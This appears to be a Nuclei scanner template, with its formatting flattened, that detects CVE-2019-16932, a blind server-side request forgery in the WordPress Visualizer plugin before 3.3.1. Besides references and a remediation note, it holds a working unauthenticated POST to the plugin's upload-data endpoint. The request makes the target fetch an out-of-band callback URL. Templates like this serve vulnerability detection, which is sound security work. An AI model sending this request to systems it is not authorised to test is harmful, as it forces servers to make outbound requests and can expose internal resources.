id: CVE-2019-16932 info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. remediation: | Update Visualizer plugin to version 3.3.1 or later to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - https://wordpress.org/plugins/visualizer/#developers - https://wpvulndb.com/vulnerabilities/9892 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 epss-percentile: 0.97221 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: themeisle product: visualizer framework: wordpress tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan,intrusive http: - method: POST path: - "{{BaseURL}}/wp-json/visualizer/v1/upload-data" body: '{\"url\":\"http://{{interactsh-url}}\"}' headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word name: http part: interactsh_protocol words: - http - type: word part: header words: - application/json - type: status status: - 200 # digest: 4b0a00483046022100e07eb5734cb5aabe757dc4b3b70d93a5284152f8cc6667829b01b3cd170e93f1022100f197db6f753aa2530d8c46856917c9a4ebd7c69f7727aa8ef6aed735374041a6:922c64590222798bb761d5b6d8e72950